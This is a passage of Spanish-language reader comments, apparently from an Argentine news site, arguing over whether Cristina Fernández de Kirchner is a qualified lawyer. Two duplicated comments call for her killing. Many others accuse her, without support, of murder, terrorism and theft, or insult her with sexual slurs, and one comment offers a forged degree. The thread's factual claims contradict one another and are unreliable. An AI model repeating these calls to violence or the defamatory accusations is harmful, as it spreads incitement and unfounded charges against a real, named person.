      La verdad, te pasaste de ignorante. No solo la terminología que utilizas atrasa un siglo, sino que tu vision de la realidad argentina no tiene sustento sino en la triste realidad que tipos como vos les hicieron y les hacen vivir cotidianamente a nuestros compatriotas. Uds. no son patriotas. Uds. SON APATRIDAS. Lo fueron en el pasado y lo siguen siendo en el presente. Confunden lealtad con complicidad; declaman cinicamente que “la patria es el otro” cuando en realidad para Uds. “la patria es el otro… que piensa como yo” y lo unico que pueden reclutar para defender este modelo de decadencia es a los pibes, porque un adulto medianamente inteligente, vivido, no los volverá a votar -si alguna vez lo hizo- “NUNCA MAS”. EL MODELO YA ESTA MUERTO. lo mató el absurdo. Pero millones de argentinos esperamos que los que lo utilizaron como patente de corso esten muy vivos, para que desfilen por los tribunales de a uno y las proximas decadas escriban sus memorias desde la carcel.

    • Hector Chingolo dice:

      Vamos a empezar por los buitres, la cris y el nestor fueron BUITRES cuando les sacaron las casas a los que no podían pagar sus cuotas indexadas por la 1050
      y ellos lo han reconocido cuando dijeron que hacían eso porque para hacer política se necesitaba plata. a los buitres que te referís (NY Griesa) lo eligió nestor como tribunales donde se acataría ;o que la ley americana decidiera.
      Re tu gobierno que tanto idolatras, empieza a decirle a tus hijos y a tus nietos que se preparen para pagar la deuda que este gobierno creo y pateo para adelante, para que ellos las paguen, no va ser macri que decidirá pagarla o no son estos tu gobierno que la creo y la pateo para adelante para el que venga tenga que pagarla (entre ellos tus hijos y tus nietos)

    • Hector Chingolo dice:

      Cge nacional y popular, conoces el refran que dice bque no hay que morder la mano que te da de comer? bueno esa clase mierda que vos decís es la que te da de morfar asi es que no escupas para arriba

    • Oscar Luque dice:

      Impresionante Compañero! Acá está el fallo del juez títere del grupo mafia Clarín, Claudio Bonadio… Que hacemos ahora con todos estos delirantes y enfermos de odio? Que hacemos con todos estos denunciadores seriales que repiten todo lo que escuchan por ahí sin antes chequear si lo que van a denunciar tiene fundamento? Y mañana con que nueva denuncia van a salir para distraer a la opinión pública en lugar de discutir las cosas importantes como los aumentos indiscriminados, los despidos, la evasión… En fin, todo esto es tan triste cumpas… tener que soportar cada día una nueva agresión, un nuevo invento, una nueva mentira.. total mañana nadie se acuerda de esto. Estas cosas son las que me hacen mas fuerte, las que me hacen sentir que estoy del lado correcto. Ya se que ni siquiera van a venir a pedir disculpas por haber escrito tantas estupideces y por haber derramado tanto odio y tanto rencor al pedo, lo mismo hacen con la muerte del fiscal NIsman…todos hablan, todos opinan, todos acusan como si supieran… Y después que? Serán conscientes del daño que provocan? Debería haber una pena, una multa, un castigo para todos los que condenan antes valiendose de pruebas falsas. HLVS! http://www.lanacion.com.ar/1906230-el-juez-bonadio-sobreseyo-a-cristina-kirchner-en-la-causa-por-su-titulo-de-abogada

  45. Anónimo dice:

    Dejen de joder, es una mentira el pais esta desquebrajandose y nos alegramos por un satrlite. Tan mal estamos que Bolivia y Paraguay son favorecidos en el cambio en un 3 a 1. Si critican la escalada dek dolar cuando estuvo de la rua, tambien crutiquen la escala del peso ahora.

  46. valeria dice:

    A ver, aclaremos los tantos. Qur por una convencion social se les diga Dr a medicos y abogados, no implica que esté correcto. Se debe llamar a c/u por lo que dice rl papel…ese es el documento que determina cuál es nstra profesión. El medico tiene escrito en su titulo “medico”, el abogado “abogado”, el veterinario “medico veterinario”. Los títulos de doctorado, son producto de un estudio de posgrado (los otros son de grado) al que se acceden por becas de entidades públicas o cubierto por act docente en una catedra o con un arancel similar cursando en universidad. Ahi, solo ahi y una vez obtenido ese titulo soa Doctor. Doctor en biologia, Doctor en derecho, doctor en neurociencias, etc. No seamos ignorantes, no nos comamos un buzón y llamemos a cualquiera “Dr”. Reconozcamos el valor de los estudioa superiores y tratemos de no satiafacer meros narcisismos profesionales.

  47. Lucas McCain dice:

    Cualquier verdura compran, cualquier verdura podrida!!! Tienen el cerebro tan lavado y tan lleno de odio infundado…

    Esto salió en CLARIN el 2 de octubre de 2007, antes de ser presidenta. EN CLARIN EH!!!

    http://edant.clarin.com/diario/2007/10/02/elpais/p-00701.htm

    • Oscar Luque dice:

      Es así nomas Lucas.. esta gente tiene mierda líquida en la cabeza. Insultan, agreden, maldicen, vomitan odio hasta por las orejas, se creen dueños de la verdad, pero no saben pedir perdón cuando se equivocan. No tienen vergüenza.. pensar que este es el ejemplo que dan a sus hijos! Los crían así, violentos, soberbios, autoritarios y lo mas triste es que en su afán de intentar imponer sus verdades absolutas, no dudan ni un instante en culpar a los demás de soberbios y autoritarios.

  48. rusa dice:

    Increíble el odio hacia quienes apoyan el gobierno por quienes no. Y después el problema son los”ñoquis K”. Generan odio y no soluciones.

  49. omar dice:

    Si esto fuera cierto… que no es abogada..? Por que carajo la siguen bancando…? Es una vergüenza tener una persona así como presidente de la nación y no descarto lo del vice… que cagada es todo esto.-

  50. MENCHO TERERE dice:

    TODO ESTO SE LO DEBEMOS A LA DEMOCRACIA QUE SUPIMOS CONSENTIR

  51. Anónimo dice:

    Deberia ser jusgada no por no tener titutulo…sino por mentirosa…cosa muy grabe para un presidente. La K DIJO QUE SU FORTUNA VENIA POR SER una ecitosa abogada

  52. Walter Fernandez dice:

    LA PREGUNTA ES QUE HAEMOS CON EL PROBLEMA LO SEGUIMOS DEATIENDO EN LOS MEDIOS SOCIALES Y QUE DE LA BUELTA AL MUNDO YQUE TODO EL MUNDO SE ENTERE QUE LOS CAMPIONES DEL MUNDO. LE METIERON EL DEDITO Y LE COBRARON LA MANO DE DIOS VENDIENDO EL PAIS DURANTE UN PROMEDIO DE 10 O MAS AÑOS. “” “VSAMOS ARGENTINA”””‡ BAMOS MIERDA QUE SOMOS LOS MAS VIVIOS DEL MUNDO / BUENO NADIE NOS SOPORTA EN EN EL MUNDO (PERO NO IMPORTA SOMOS LOS MEJORES) ANDA LA PREXIDENTA SE LO CREE POR ESO HACE LO QUE HACE.

  53. juan eduardo dice:

    ME SUENA A CORTINA DE HUMO.
    CON TITULO O SIN TITULO, LA INEPTITUD PARA GOBERNAR ESTA DE MANIFIESTO.
    LOS DENUNCIADO EN EL JUZGADO FEDERAL Nº 1 EN LO CRIMINAL DE LA R.A. AÑO 2014, CON EL TESTI-
    MONIO DEL GENERAL HERIBERTO AUEL (USTED PUEDE VERLO EN YOU TUBE BAJO ESTE TITULO:””PLAN
    CONDOR 3 PARTE TESTIMONIO HERIBERTO AUEL””)
    ALLI ESTA CLARITO: BUSCA DEL ESTADO FALLIDO Y NARCOTERRORISMO
    PARECE HIPOTETICO PERO COMPÀRE CON LA REALIDAD QUE SE ESTA VIVIENDO.
    SOLO ESPERO QUE LOS JUECES Y FISCALES ALLI INTERVINIENTES SAQUEN ALGUNA CONCLUSION
    DADO QUE LA REPUBLICA ARGENTINA ESTA EN RIESGO Y NI ELLOS SE VAN A SALVAR.

  54. Roberto dice:

    Yo creo que si todo esto es cierto y esta chequeado, quien haya empezado esta investigacion tiene la obligacion moral de hacer una presentacion ante la justicia, porque es una acusacion grave. Si esta mina realmente no es abogada, debe recibir su castigo. Y si se esta difundiendo una informacion malintencionada, el responsable de hacerlo deberia ser puesto a disposicion de la justicia

  55. marce bonelli dice:

    SEPRIN… contanos quién te garpa…. farzante. O vas a decir q infobae es oficialista???

    http://www.infobae.com/2014/11/06/1606860-para-la-justicia-no-hay-dudas-cristina-kirchner-es-abogada

  56. Larouse dice:

    La otra vez que también rosqueaban con esto ya habían demostrado que era campaña y operación como todo lo que hace seprin.

  57. Gaby dice:

    YO LA VOTE Y NO POR SI ES O NO ES ABOGADA, ESO NO SE ME PASO POR LA CABEZA EN EL CUARTO OSCURO, Sí SE ME PASO POR LA CABEZA LO QUE HIZO HASTA EL MOMENTO NESTOR KIRCHNER, COMO FUE PAGANDO DEUDAS DEL PAIS Y COMO SE PUSO EN EL LUGAR DE PRESIDENTE CUANDO EL PUESTO ERA DEJADO COMO SI FUERA UNA DESGRACIA DE RESPONSABILIDAD POR TODO CANDIDATO A DICHO PUESTO EN UNA ARGENTINA DE CACEROLAZOS DONDE YO RECIÉN HABÍA EGRESADO DEL SECUNDARIO Y SIN POSIBILIDADES DE SEGUIR ESTUDIANDO TRABAJÉ Y DONDE MI JEFA ME DECIA QUE POR LA SITUACION DEBIA PAGARME POR SEMANA PORQUE CAPAZ QUÉ EN LA SIGUIENTE NO IBA A PODER PAGARME POR LO QUE CAPAZ NO ME NECESITARÁ MAS.LA FILA DEL SERVICIO SOCIAL DABA COMO MEDIA VUELTA LA CUADRA Y AHORA NO HAY NADIE. EN MI CIUDAD COMENZARON EN ESA ÉPOCA A ANDAR LOS CARTONEROS AHORA LOS CARTONES NO LOS LEVANTA NADIE (se apilan fuera de los negocios) SOLO LOS SACA EL SERVICIO DE RECOLECCION QUE SIEMPRE ESTUVO EN LA CIUDAD, A SIMPLE VISTA SE PUEDE COMPARAR LA REALIDAD

  58. carlos barcero dice:

    Ya salieron las alegres comadres de Windsor a escribir gansadas.Cristina eructa y bueno, se arma el gran alboroto. Sinceramenrte, estan convirtiendo al pais en un conventillo. Sera que tal vez querrian un Maduro o un Raul Castro de Presidente????

  59. Anónimo dice:

    rasas de vivoras todos.. naei conforma a nadie y ke mierdad era menen hjioos de puta!! q salen a criticar si lo hacen digas cosa buena y milas..y no se recuerdon el pasado argentino ..o no viviernon los 80 y 90 y 2000… ???????????????? asi hablen de otro ex presiendtes se re cagan para decir aah

  60. mendinos mendi dice:

    ES TAN TRUCHA QUE LE ENSEÑO A BUDU A TRUCHAR . QUIERO QUE PAGUE POR TODO EZTO

  61. yurem dice:

    Jajajajajajjaja zorra loca la vividora del sur.

  62. MARTA dice:

    POR SUPUESTO NO S ABOGADA, ES MONTONERA DE LOS 70, LADRONA MAFIOSA CORRUPTA, DESTRUYO LA ARGENTINA Y QUIERE VERLA AUN PEROR, MERECE QUE LA AGARREN LO ISSI, OJALA YAAAAAAAA ACERQUENSE BAJENLE EL AVION Y SALVEN A 30 MILLONES DE ARGENTINOS, QUE ESPERAS ESTA VIEJA ES TERROSITA MAFIOSA, ASESINO A UN FISCAL, LLENO DE MAFIA Y VAGOS EL PAIS Y DESTRUYO A LOS TARBAJADORES HONRADOS HONESTOS, HAY QUE LIQUIDARLA, QUE ESPRAS OBAMA DALE SALVANOS VOS PODES MANDA MATARLA Y SEREMOS FELICES ESO ESPERO VERLA COMO AL VIZCO ENTERRADA YAYAYAYYAYAYAYAYYAYAYAYA FUERA MONTONERA TERRORISTA CRISTINA FERNANDEZ DE KIRCHNER, D VIDO, RANDAZO, RECALDE,KICILOF MAFIA QUE SE ROBARON TODO EL PAIS ESTA MAFIA NO MERECE VIVIR. BASTA!!!!!! JUSTICIADIVINA SINO DE DIOS PARA TODOS ESTOPS MAFIOSOS QUE ESPERAS DIOSSSSSSS

  63. CLAUDIA dice:

    POR SUPUESTO NO S ABOGADA, ES MONTONERA DE LOS 70, LADRONA MAFIOSA CORRUPTA, DESTRUYO LA ARGENTINA Y QUIERE VERLA AUN PEROR, MERECE QUE LA AGARREN LO ISSI, OJALA YAAAAAAAA ACERQUENSE BAJENLE EL AVION Y SALVEN A 30 MILLONES DE ARGENTINOS, QUE ESPERAS ESTA VIEJA ES TERROSITA MAFIOSA, ASESINO A UN FISCAL, LLENO DE MAFIA Y VAGOS EL PAIS Y DESTRUYO A LOS TARBAJADORES HONRADOS HONESTOS, HAY QUE LIQUIDARLA, QUE ESPRAS OBAMA DALE SALVANOS VOS PODES MANDA MATARLA Y SEREMOS FELICES ESO ESPERO VERLA COMO AL VIZCO ENTERRADA YAYAYAYYAYAYAYAYYAYAYAYA FUERA MONTONERA TERRORISTA CRISTINA FERNANDEZ DE KIRCHNER, D VIDO, RANDAZO, RECALDE,KICILOF MAFIA QUE SE ROBARON TODO EL PAIS ESTA MAFIA NO MERECE VIVIR. BASTA!!!!!! JUSTICIADIVINA SINO DE DIOS PARA TODOS ESTOPS MAFIOSOS QUE ESPERAS DIOSSSSSSS

  64. JUAN EDUARDO dice:

    QUIEREN APARTAR AL JUEZ DE LA CAUSA HOTESUR, ¿QUIERE UNA JUSTICIA SOLO QUE BENEFICIE A
    LA REINA?
    LA REINA ES MUY LOCUAZ Y HASTA CONVENCE A ALGUNOS, PÈRO LOS QUE ESTAN ATRAS SON LOS
    QUE FUERON CORRIDOS POR PERON QUE LUEGO SE ALIARON AL ERP DE SANTUCHO Y GORRIARAN MERLO
    SON LOS QUE ESTAN HOY EN LOS TRES PODERES DEL ESTADO TRATANDO DE VACIARLO Y DESTRUIRLO.
    QUIEWREN UNA JUSTICIA PROPIA, MILICIAS ARMADAS AL SERVICIO DEL PARTIDO EN VEZ DEL EJERCITO NACIONAL, QUIEREN EL CAMBIO DE LA CONSTITUCION,.
    EN SINTESIS: PAIS SIN DIOS, SIN PATRIA SIN LEY, ESTADO FALLIDO Y SANTUARIO DEL DELITO Y PAIS
    NARCO, TAL CUAL MEXICO.

  65. migue dice:

    no mires la paja en el ojo ajeno ..sino mira el tronco que hay en el tuyo…. no harias lo mismo si fueses politico ‘?

  66. miguel dice:

    Seprin? Esto tiene menos seriedad que cacerolo con ideales. Se juntan como moscas en tereso.

  67. arturo Quiroga dice:

    Estoy sorprendido, por casualidad despues de leer el artículo y escuchar la entrevista creo cada ves menos en la justicia.. no solo en su país se dan estos casos de falsificar titulos para lograr objetivos oscuros… EL PROBLEMA es que lo hizo La Sra. Cristina Fernández, LA IMAGEN DE UNA TODO UNA NACIÓN… En Bolivia tenemos muchos casos similares de abogados y jueces que estan sometidos al poder de turno y la libre expresión y los medios de comunición estan amenazados. Tengamos FÉ, algún día viviremos en un continente más digno.

  68. MENCHO TERERE dice:

    BUENO, BUENO, …VAMOS A TERMINARLA CON QUE SI ES O NÓ ES ABOGADA, DESPUÉS DE TODO QUE IMPORTA, ….SI EL TITULO NO HACE NINGUNA FALTA PARA SER “UNA P.TA EXITOSA”

  69. juan dice:

    PERO COMO ? NO ERA UNA ABOGADA EXITOSA Y DE AHI SACO SU DINERO ? CHANTA !! DEBERIA ESTAR PRESA POR ESTO JUNTAMENTE CON EL DIRECTOR DE LA UNIVERSIDAD POR COMPLICE

  70. Susana dice:

    simple, es este país se llama ejercicio ilegal de la profesión, el colegio de abogados que hace ???

    • MENCHO TERERE dice:

      COMO NO ES ABOGADA, EL COLEGIO DE ABOGADOS NO SE METE, …AHORA QUE ORGANIZACIÓN ES LA QUE SE DEBE METER CON LA PROFESIÓN DE ESTA “PROFESIONAL P.TA EXITOSA”?

  71. Luismi dice:

    Puedo decirles que el que medicos, bioquímicos o abogados ( y ahora contadores) se llamen doctores es una costumbre que viene de la época de que los que estudiaban esas dos profesiones ( medico y abogado) eran los únicos léidos y entonces se los llamaba doctores. Al mismo tiempo un pobre filósofo o teólogo no podía ser llamado doctor si no había hecho realmente una tesis original. Y que me cuantan de los pobres( esos si me dan lástima) ingenieros que si hacen una tesis original real y nunca son llamados doctors por simple costumbre. Conozco al primer dr en Ciencias Agrarias de la Argentina que fué también profesor mío y en el año 1983 intentó inscribir el título de doctor en en colegio de ingenieros agrónomos y le dijeron los argumentos más inverosímiles para no hacerlo. El más tonto fué”no esta el título en la nomenclatura informática” Cuando casi no existía la informatica. el pobre se rompió todo para sacar su título( casi pierde la vista d eun ojo por trabajar con cloroformo) en una rigurosísima universidad alemana y y al volver fué ignorado totalmente. También se burlaron de él en el CONICET(era investigador) y nunca le reconocieron el título hasta que algún capo del mismo CONICET se doctoró ( como lo hizo no me pregunten) entonces si comenzaron a tomar en serio el título de doctor. En fin son cosas de nuestro querido país. Hay una cultura del desperdicio que se ensaña en desperdiciar gente ya que el recurso humano es el último en ser considerado. Mientras tanto los que no tienen título de grado o título de doctor deben ser llamados doctor. Así van las cosas.

  72. Anónimo dice:

    Hasta el nombre es trucho “ELISABET”

  73. SEBASTIAN LIMERES ABOGADO Y MARIA EUGENIA VES LOSADA dice:

    EL DR CARLOS VES LOSADA TIENE FUERTES RELACIONES EN LA PLATA Y ESTA DISPUESTA A HACERLE FALSIFICAR UN TITULO A CRISTINA.
    COMUNICARSE AL 43220445 Y 43267492.

  74. Edy Ficio dice:

    DEBE 23 MATERIAS PORQUE NO TIENE MATERIA GRIS EN EL BALERO

  75. Roberto dice:

    La verdad, para mí no tiene la menor importancia.

  76. boludo normal dice:

    claro.. no tiene importancia, cuando la señora clarito lo dijo en “JARBAR”, que ella hizo su fortuna como una exitosa abogada. Al margen si es o no abogada (que ya es grave por su investidura presidencial) en el tiempo que incremento su capital furiosamente, era senadora y despues presidente). Hasta donde yo entiendo los titulos se inhiben por lo que no podria haber ejercido. y su estudio?… nadie lo conoce tampoco.

  77. ANONIMA dice:

    Es patética la discusión a la q han llegado porq sea o no sea abogada la señora nos gobernó durante ocho años….esto nos enseña q en Argentina cualquiera llega al poder

  78. ANA dice:

    TODA LA CIUDAD DE LA PLATA SABE ESTO. NO ES ABOGADA Y NUNCA LO FUE ….CUALQUIERA LO PUEDE COMPROBAR PIDIENDO LOS LEGAJOS. NO TIENE TÍTULO DE NADA. NOS GOBERNÓ DURANTE 8 AÑOS Y ANTES FUE SENADORA MOSTRANDO UN TÍTULO QUE NUNCA TUVO….O SEA HACE MAS DE 3 DÉCADAS QUE NOS ESTÁ MINTIENDO A TODOS LOS ARGENTINOS. SI EN UNA COSA COMO ESTA NOS MIENTE IMAGINENSE EN TODO LO DEMÁS…ACLARO QUE SOY PLATENSE Y VIVO EN LA PLATA, NINGÚN DECANO DE LA UNIVERSIDAD NACIONAL DE LA PLATA PUDO ENCONTRAR NINGÚN TÍTULO DE LA SRA CFK Y ESO LO SE NO POR EL DIARIO CLARÍN, LO SE PORQUE HE HABLADO CON VARIOS

  79. Fernando dice:

    Si esto es cierto esta señora ,por decir algo,es y ha sido una impostora,desde España, te lo digo Cristina Fernández y no Doña,pues no tiene ningún doctorado

    • Darksuke dice:

      no vengas si estas en españa quedate ahi, primero que debes aprender algo de español, segundo no se le dice doctor al medico y abogado por tener el titulo de doctorado, agarra un diccionario y te vas a enterar, segundo, estas paginas estan hechas para giles que no investigan y compran huevadas…. Felicidades!, sos un titere mas.

  80. Marianella dice:

    REGALOS NAVIDEÑOS. ATENCION EMPRESAS… — > http://goo.gl/AOsSeN

  81. anaya dice:

    de donde salieron estos zatrapas menos mal que no tienen microfonos sino serian un lanata cualquiera jijijijiji

  82. Florencia dice:

    Yo solo puedo ver lo que se logra con esto. Que nos peleemos entre nosotros. Mientras ella se va con un patrimonio “declaro” de 64 millones y cuando empezó de presi era de 4 millones. Alguien puede decirme cuantos abogados conocen que hayan incrementado en el mismo periodo sus arcas, ” por ser un abogado exitoso” .. eso si es falta de respeto.

  83. Yonomás dice:

    porque no va a poder decir que es abogada si ni siquiera es Fernández el apellido es Willhelm de la madre, el chofer Fernández era el padrastro. Tampoco dice de la hija minusválida que tubo de SOLTERA.

  84. Literalmente Me Chupa El Huevo Izquierdo Si Es Abogada o No Bueno Que Me Venga a Chupar La Poronga y Todos Ustedes Son Unos Tarados Pelotudos Mal Nacido Vende Empanadas En La Panamericana La Recalcada Concha De Su Madre Aguante Bin Laden y La Mona Gimenez Chau Putos!

  85. alambrelon dice:

    bueno muchachos no sean tan malos, NO habrà sido Abogada pero al menos si MEDIO ABOGADA, debía la MITAD de las materias.Ahora que esta sin curro en una de esas las completa,falta que diga que es virgen y los opas que la siguen le crean.-

  86. Silvio dice:

    Que quede claro: Cristina es ABOGADA y Sabsay NO ES constitucionalista!!! Jamás hizo posgrado alguno en ese sentido. SABSAY ES UN CARADURA.

  87. lidia dice:

    perdon pero el dni 10433 no es del 53 …el mio empiesa con 10624 y soy del 52—aparte si ese documento es real esta borroneado ,,es posible que nos gobernara alguien tan trucho ?

  88. PREGUNTA A BOLUDOS dice:

    POR QUE NO MUESTRA EL TITULO, Y LISTO’?

  89. oscar dice:

    a nadie le llama la atención que en el original el DNI pertenezca a Olmos Valentin y Fecha de nacimiento: 16 de diciembre de 1943 y en el original la fecha es el 10 de agosto de 1989? porque tendria otra fecha de naciemiento si supestamente es de olmos porque el nombre no esta corregido y es de una tal Fernandez, Cristina Elisabet? la fecha de expedicion es el 22 de octubre no el 12 como dice el artículo, si supuestamente es de Olmos el certificado, porque el nombre no esta corregido? porque la fecha de nacimiento que figura es de 1989 y no de 1943 como deberia tener la realidad es que no son borrones si no sobrescrituras, me van a decir que nunca hicierron un tramite en la policía y usan una máquina de escribir y tienen que remarcar varias veces una letra, y aveces no cae en el mismo lugar la verdad si miro el originla no veo las fechas que indica el autor de este artículo es una total mentira esto

  90. Maria dice:

    A uds Seprin, no se los conoce en la jerga como “pescado podrido”?, así como ella truchó su analitico uds. tambien pudieron truchar ésta información, y ésto lo digo por que los mismos argumentos que uds utilizan para vender info, se puede utilizar para desprestigiarlos a uds con sus propios argumentos. Los leo siempre y la verdad que son casi como la noticia rebelde pero la versión cachengue.

  91. Anónimo dice:

    yo creo que si es abogada. pero mi mujer trabajó en una empresa 5 años con un jefe contador hasta que saltó la bronca y el tipo no era contador ni un profesional era un garca por culpa de ese echaron una administracion entera esta lleno de truchos .

  92. yo dice:

    a quien pingo le importa que titulo tiene esta vieja culiada

  93. Perceval Ciro dice:

    Que pagina de porquería. Esta bazofia como la bazofia de lo que era periodismo oficialista genero todo este horror “intelectual” donde se dice cualquier basura y nos confunden. Para el que quiera saber no hay ninguna causa que haya podido seguir porque casi todas fueron desestimadas por eran inconsistentes. Y la que quedo resolvió que Cristina es abogada. http://www.infobae.com/2014/11/06/1606860-para-la-justicia-no-hay-dudas-cristina-kirchner-es-abogada

  94. bitaker dice:

    un muy buen ejemplo para todos los infras y oligos de la camporita: se puede ser farsante, usurpador de titulos, no tener estudios terciarios o universitarios y ser presidenta de todas y todos

  95. Anónimo dice:

    QUE FRAUDULENTOS QUE SON USTEDES.ESTÁN MINTIENDO PORQUE LO QUE MUESTRAN ES SÓLO UN FORMULARIO DE ARCHIVO QUE PUEDO SER EXTRAÍDO Y REFLEJA SU SITUACIÓN COMO ESTUDIANTE 4 AÑOS ANTES DE QUE SE RECIBA Y SI, EN ÉSE MOMENTO LAS DEBÍA, TAL VEZ, PORQUE PARA CONSTATARLO USTEDES TIENEN QUE PRESENTAR LA COMUNICACIÓN DE LA UNIVERSIDAD DE LA PLATA -CON FECHA ACTUAL- DEBIDAMENTE RUBRICADA Y AUTORIZADA POR EL RECTORADO. ADEMÁS NADIE, MENTIROSOS, NADIE PUEDE FIRMAR UN SOLO PAPEL COMO ABOGADO SI NO ESTÁ COLEGIADO Y SU TÍTULO DEBIDAMENTE LEGALIZADO. ESO NO SOLO PARA SU ACTIVIDAD PROFESIONAL SINO QUE LO DEBE PRESENTAR CON TODAS LAS DE LA LEY EN REGLA CUANDO ASUMIÓ COMO DIPUTADA PROVINCIAL Y LUEGO COMO SENADORA NACIONAL YA QUE ADEMÁS COBRAN UN PLUS POR EL TÍTULO.NI HABLAR CUANDO ASUMIÓ Y FUÉ REELECTA. ESTÁN MINTIENDO DESCARADA Y ESTÚPIDAMENTE CON LA INTENCIÓN DE DIFAMARLA Y ANTE EL PÁNICO QUE TIENEN DE QUE EN MENOS DE UN AÑO TODO EL PUEBLO LA VA A VOLVER A PONER NUEVAMENTE COMO PRESIDENTA. ÉSTOS INEPTOS DEL PRO EN SEIS MESES CHOCAN LA CALESITA.Ahhh….me olvidaba NO SE PIERDAN EL REALITY SHOW DE LOS 3 ASESINOS (hoy inmundos, siniestros dispuestos a todo, PERO DURANTE LA CAMPAÑA PRESENTADOS COMO DECLARANTES HONESTOS EN TODOS LOS CANALES BASURA) A LOS QUE NO PUEDEN AGARRAR NI CON 700 MILICOS EN UN RADIO DE 200 KMS.PAPELONEROS, MENTIROSOS….PASA QUE LOS MUCHACHOS ESTÁN PIDIENDO MUCHO PARA NO ABRIR LA BOCA y MANDAR AL FRENTE A TODOS LOS MENTIROSOS QUE LOS USARON…QUÉ ASQUEROSOS !!!

  96. Responde salames dice:

    No entiendo como gente en el 2015 se sigue sorprendiendo, cuando al asumir el insoportable de macri dijeron que era el primero en asumir que tenía titulo universitario

  97. Anónimo dice:

    O sea que nos goberno una pata sucia, no universitaria, gozadora por el culo

  98. JUAN dice:

    POR SUPUESTO QUE NO ES ABOGADA HOY LE METIERON OTRA DENUNCIA Y AHORA CON MACRI SE SABRA LA VERDAD Y TODOS LOS COBERCHORIS SE LA VAN A COMER DOBLADA: http://periodicotribuna.com.ar/17227-denuncian-a-cfk-por-falta-de-titulo-de-abogada.html

  99. Luis dice:

    Nuestro profesor de tecnogenia ambiental fué el primer doctor en ciencias agrarias de Argentina. Obtuvo su doctorado en la Universidad de Stuttgart en Alemania.Siempre nos decía a sus alumnos en forma chistosa que era un “Dr sin doctoreo” ya que jamás consiguió que lo llamaran Dr se debía contentar con su título de grado de ingeniero. Nuestro profesor fué un científico íntegro que se dedigó a investigar las causas de los defectos tecnológicos que dañan a la salud humana. Fué el fundador de la technopathogenology, En el CONICET de dónde era investigador nunca consiguió que lo evaluaran pares de su especialidad y fué ignorado

  100. Nika dice:

    Este gordo con acentito porteño es un asco, ahora que gobiernan…Que democraticos que son!!! bajan sueldos. echan trabajadores, se les escapan los chorros, le llevan la platita a los fondos buitres, echan periodistas, ESTOS DICIENDO HECHOS como dice ese impresentable. En cuatro años en Argentina flamea la bandera inglesa o yanky

  101. Augusto dice:

    La conpaniera Cristina debe 22 materia, y es cierto, no se resivió, pero ay que tene en cuenta que eya era militante de la JP y por lo tanto hera una percegida politica … y lo profe gorila la tenían marcada .. y aunque hera la mejo alumna la aplasavan igual.
    Lo gorila asta la trataron de gato y que asía la yeca … y capa que lo asía pa pagarse lo estudio.

  102. Cristina López dice:

    ME DA PENA… mucha pena. Esto es MENTIR CON LA VERDAD. Primero acusa desde la DUDA… de la mera sospecha. Ni se detiene a dudar de a quién les está hablando…nada más ni nada menos que son los que hundieron este país, lo desfinanciaron, lo entregaron e hicieron de los argentinos un pueblo sin esperanzas… LAS VERDADES QUE DICE…ocultan a esta audiencia que lo aplaude, LAS VERDADES QUE DICE, las dice de cara a los mismos ladrones que las desmienten… NO ES A LA PRESIDENTA (EX) QUE LE CABE EL SAYO sino a revés, exactamente al Revés. LA ARGENTINA DURANTE 12 AÑOS, remontó la industria, el empleo, el estudio, la alegría de los pobres….LA VERDAD QUE USTED DICE, SÓLO CONTRASTA CON LA VERDAD HISTÓRICA, pues ahí frente a UD. tiene a los responsables de lo que USTED CRITICA, ahí frente a UD. tiene a quienes indtrodujeron los monopolios, la riqueza concentrada, la xenofobia, la exclusión…. ahí están los que como UD. Mienten con la VERDAD…HAZ LO QUE YO DIGO, Y NO LO QUE YO HAGO….FINALMENTE… ERROR GRAVÍSIMO COMETE UD. al JUZGAR al CANCILLER como traidor… PUES EL TRABAJO DEL SR. TIMERMAN… no es sentarse a conversar sobre el HOLOCAUSTO OCURRIDO EN LA ÚLTIMA GUERRA… NOOOO…NO MEZCLE LAS COSAS…SE TRATABA DE UN HECHO PUNTUAL… QUE QUEDÓ CONGELADO HACE 20 AÑOS!…Y USTED, LO ACABA DE SEPULTAR CON SU INSENSATEZ DE MEZCLAR DOS ASUNTOS… que están unidos solamente en el corazón de la humanidad y lo seguirán estando hasta la eternidad, pero NO MEZCLEMOS LAS COSAS…. aquí, en Argentina, hubo un ocultamiento terrible… y de eso El Ex canciller…trató con las herramientas que tuvo y pudo….¡TANTA ES SU CEGUERA SR. SABSAY!… DÉSE CUENTA LO QUE ES “MENTIR con la VERDAD”…NO ME DETENGO a escribir sobre el TÍTULO DE ABOGADA DE CFK…no tiene sentido…TODO EL PAPELERÍO YA FUE MOSTRADO, y espera LAS DISCULPAS DE USTED. PERO…si no hubiera sido así….si realmente la abogada CRISTINA FERNANDEZ DE KIRCHNER, no lo fuera….¿DESMENTIRÍA ACASO LA MARAVILLOSA EFICACIA DE SU GESTIÓN QUE OCASIONÓ EL RENACIMIENTO DE LA ARGENTINA???!!!. NO SE PUEDE TAPAR EL SOL CON UN DEDO….Sr. Sabsay!… AHORA, HOY, 31 DE ENERO DE 2016… aquéllos a quienes hablaba usted… HOY…han vuelto bajo su prédica… y HOY… a 50 días de gobierno….¡DESTRUYERON!… todo lo bueno…y también lo malo que había que corregir….CON TODO RESPETO SR. SABSAY… dése cuenta a quiénes habla, y a quién les cabe el sayo de las VERDADES QUE USTED DICE.

  103. María dice:

    Corroborar la huella digital. No es necesario romperse los cuernos mirando lo borrado.

  104. Anónimo dice:

    YO SOY ACTRIZ NACIONAL Y TENGO TITULO

  105. Anonimo dice:

    Que es verdaderamente interesante como tanta gente puede discutir en estas paginas llegando a transgiversar el verdadero sentido de una publicacion. Que tendran que ver los medicos, los abogados , los actores y todos los demas que citan. El hecho que no se recibio y punto. cuanta discucion sin sentido

  106. Laurra dice:

    Este lugar huele y rima con clarín

    • Miguel dice:

      Jaaa te creiste todo el verso de los chorros y ahora lo único que te queda es defenderlos…. lamentable lo tuyo, te lo avisaron durante 12 años, vos queres seguir creyendo y bueno si te gusta es porque hubieras querido que el relato fuera como te lo contaron. lo peor de todo que gente como vos todavía quedaron esperanzados en que algo iria a cambiar. 12 años con cada vez mas pobre y gente muriéndose de hambre, con delicuencia, droga, y curros del gobierno pero hechemosle la culpa a este gobierno sino como vamos a seguir defendiendo lo indefendible. AHI TENES LA JUSTICIA SOCIAL DE CRISTINA no la queres ver? y bueno segui metiendo la cabeza abajo de la tierra y grita viva cris

  107. henry dice:

